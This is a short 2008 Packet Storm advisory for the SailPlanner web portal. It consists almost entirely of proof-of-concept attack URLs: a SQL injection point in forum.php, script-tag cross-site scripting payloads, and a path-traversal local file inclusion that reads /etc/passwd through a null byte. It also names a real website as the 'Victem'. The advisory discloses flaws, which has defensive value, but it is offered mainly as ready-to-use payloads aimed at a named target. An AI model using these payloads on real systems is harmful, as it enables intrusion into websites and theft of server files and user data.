sailplanner-sqlxsslfi.txt

2008-12-04T00:00:00
ID PACKETSTORM:72595
Type packetstorm
Reporter Pouya Server
Modified 2008-12-04T00:00:00

Description

                                        
                                            `#########################################################  
---------------------------------------------------------  
Portal Name: SailPlanner  
Vendor : http://relative.nl/projects.php?subMnuItem=1  
Author : Pouya_Server , Pouya.s3rver@Gmail.com  
Vulnerability : (SQL,XSS,LFI)  
---------------------------------------------------------  
#########################################################  
[SQL]:  
http://site.com/forum.php?subMnuItem&mid='[SQL]  
  
[XSS]:  
http://site.com/?subMnuItem=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>  
http://site.com/directory.php?key=<script>alert(1369)</script>  
  
[LFI]:  
http://site.com/?subMnuItem=../../../../../../../../etc/passwd%00  
  
  
---------------------------------  
  
Victem :  
http://relative.nl  
`